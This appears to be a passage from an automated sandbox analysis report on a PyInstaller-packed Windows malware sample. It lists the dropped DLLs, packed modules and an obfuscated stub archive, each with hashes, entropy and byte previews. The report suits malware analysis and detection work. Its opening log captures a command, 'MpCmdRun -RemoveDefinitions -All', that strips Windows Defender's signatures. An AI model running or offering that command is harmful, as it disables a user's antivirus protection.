                                                                                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 2.7. .. 2.0.2.4. .1.3.:.4.4.:.3.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 2.7. .. 2.0.2.4. .1.3.:.4.4.:.3.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\VCRUNTIME140.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):120400
                                                                                                                                                                                                                            Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                            MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                            SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                            SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                            SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: 5K9iuU0ALY.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: grA6aqodO5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: cPl7CoJTBx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: R6IuO0fzec.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Win64.Malware-gen.11853.10965.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Gen.Variant.Lazy.564550.16803.23255.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: H2f8SkAvdV.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):49424
                                                                                                                                                                                                                            Entropy (8bit):7.815740675307968
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
                                                                                                                                                                                                                            MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
                                                                                                                                                                                                                            SHA1:12CB7EC39F3AF0947000295F4B50CBD6E7436554
                                                                                                                                                                                                                            SHA-256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
                                                                                                                                                                                                                            SHA-512:AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: 5K9iuU0ALY.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_ctypes.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64272
                                                                                                                                                                                                                            Entropy (8bit):7.834005148796091
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
                                                                                                                                                                                                                            MD5:79879C679A12FAC03F472463BB8CEFF7
                                                                                                                                                                                                                            SHA1:B530763123BD2C537313E5E41477B0ADC0DF3099
                                                                                                                                                                                                                            SHA-256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
                                                                                                                                                                                                                            SHA-512:CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_decimal.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):120080
                                                                                                                                                                                                                            Entropy (8bit):7.901857200989369
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
                                                                                                                                                                                                                            MD5:21D27C95493C701DFF0206FF5F03941D
                                                                                                                                                                                                                            SHA1:F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
                                                                                                                                                                                                                            SHA-256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
                                                                                                                                                                                                                            SHA-512:A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_hashlib.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36112
                                                                                                                                                                                                                            Entropy (8bit):7.6548425105220375
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
                                                                                                                                                                                                                            MD5:D6F123C4453230743ADCC06211236BC0
                                                                                                                                                                                                                            SHA1:9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
                                                                                                                                                                                                                            SHA-256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
                                                                                                                                                                                                                            SHA-512:F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_lzma.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):88336
                                                                                                                                                                                                                            Entropy (8bit):7.9108932581373015
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
                                                                                                                                                                                                                            MD5:055EB9D91C42BB228A72BF5B7B77C0C8
                                                                                                                                                                                                                            SHA1:5659B4A819455CF024755A493DB0952E1979A9CF
                                                                                                                                                                                                                            SHA-256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
                                                                                                                                                                                                                            SHA-512:C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_queue.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):27408
                                                                                                                                                                                                                            Entropy (8bit):7.449801379195215
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
                                                                                                                                                                                                                            MD5:513DCE65C09B3ABC516687F99A6971D8
                                                                                                                                                                                                                            SHA1:8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
                                                                                                                                                                                                                            SHA-256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
                                                                                                                                                                                                                            SHA-512:621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_socket.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):45328
                                                                                                                                                                                                                            Entropy (8bit):7.729647917060796
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
                                                                                                                                                                                                                            MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
                                                                                                                                                                                                                            SHA1:622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
                                                                                                                                                                                                                            SHA-256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
                                                                                                                                                                                                                            SHA-512:0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_sqlite3.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60176
                                                                                                                                                                                                                            Entropy (8bit):7.847943448203495
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
                                                                                                                                                                                                                            MD5:8CD40257514A16060D5D882788855B55
                                                                                                                                                                                                                            SHA1:1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
                                                                                                                                                                                                                            SHA-256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
                                                                                                                                                                                                                            SHA-512:A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_ssl.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):68368
                                                                                                                                                                                                                            Entropy (8bit):7.86108869046165
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
                                                                                                                                                                                                                            MD5:7EF27CD65635DFBA6076771B46C1B99F
                                                                                                                                                                                                                            SHA1:14CB35CE2898ED4E871703E3B882A057242C5D05
                                                                                                                                                                                                                            SHA-256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
                                                                                                                                                                                                                            SHA-512:AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...).........P.......`...................................@............`.........................................l<..d....9.......0.......................<.......................................(..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1394456
                                                                                                                                                                                                                            Entropy (8bit):5.531698507573688
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                                            MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                                            SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                                            SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                                            SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\blank.aes

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):116152
                                                                                                                                                                                                                            Entropy (8bit):7.710598542399932
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:T92W3Q3S9sPAG8pRHaymy/8/u+BeLJS3zeBV5+ilKP4zQMPDMaR9vRgXIVqZjDlv:u5Ixbb/8/De1Su+hPM9Pzu4VMe5nW
                                                                                                                                                                                                                            MD5:72A26F137C9B188C5E6BB736A4F3F44B
                                                                                                                                                                                                                            SHA1:E30621CBF3C96819D8A9CE377E5DBBCD28F91196
                                                                                                                                                                                                                            SHA-256:0DACCFB042D394E0D7DB3C6CE5FFBED6C4DF9BED3E3F29AD39366AD31C83838B
                                                                                                                                                                                                                            SHA-512:3FAF2BBBD90A50C0A70323AA866B5ED37D5775B551F76C8F1E479EAF02C6BF2B117E4AD86C6E274576ABD2645EBB71F80A79E5F3960EAEBEA11C029C5791453F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:PK........ .ZY.X.B...B.......stub-o.pyc........l-.g.#.............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\bound.blank

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:DOS executable (COM)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):284296
                                                                                                                                                                                                                            Entropy (8bit):7.995427844782166
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:BzMD1RW7EqTsIiYHxEyEIwQxys5BaVKb+mEQ3XdUzKvRnHqnVG:RIReEcZ8UyKbEQ3XdvRnIs
                                                                                                                                                                                                                            MD5:7ACDDDB95612D1E0C2E806A9CA72432F
                                                                                                                                                                                                                            SHA1:BA7EDE3271E1D5CC0E807603D9284C26CEF1B80B
                                                                                                                                                                                                                            SHA-256:DCCF165E44C7B2584CE3418A85D8D571AFB9CC6DB6C9280B7C90DCF8BAEEF7EA
                                                                                                                                                                                                                            SHA-512:6C81E99851405E2B1B639EA7EF51FD1DA84D9D50F95579F7D8C4442EC5566F79B99C0DE594E5823687DB582F47A38C6C71B8B15DE04BDE4CEFC630EBF5E09CBB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.W.q....?.....O....3..6{....j.dT.fLwr....u+U-.....R..g.?.uzx.......X}/........w....=..pw.R|.x..?...{M.e...6..SsT$9..{....9h.{..h|..........a.g.6...9Y0...4m......U'g7v..s........L.9(...*..}.-.z.!..}...JCn..........8.t...p..Cn.\`.f./..J....=]...=A.`s..Je|.`h;...=...@x|........va/........!.M...r...#...nLz......2.<. ..c.....`.D>.._8E..K+,...h.....GBy..uE.{.YS.e....K...J....=......f.....&....?.-.'.Q........i...$D.ILe<..>4.|............C;t..w3v^....q..x..h...'..\...m7m.....Sw...[(~.z..3hu.22S...o+.v..Ozd..M.50|Ch...'..Q...P....tF..h..H3/M.....M}<.37L.cW_.....5...<....Ik.7?_^...ai..kL...1.............}..?.C........o;........e.....y................*.._...K=...}....;.u.=..4...._...7..~.7...........GM.4..S.&}.h..F=.z.....A..?h..;.&..D6.^.P.E.P.`.......3...&.nW.B..g.r.:..\..q|z.i....-..^}S<...<.=.K..R..;....S.&g.Q.r3..fb..W_.e9y...n...z..@\).d.:>........z.._...QO...R.-..*.{=..YvUn%.9.&..>/9vf}C>.?....A.[....M.:..z..X^..Qg...f.W_./..P~....

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\libcrypto-3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1630488
                                                                                                                                                                                                                            Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                            MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                            SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                            SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                            SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
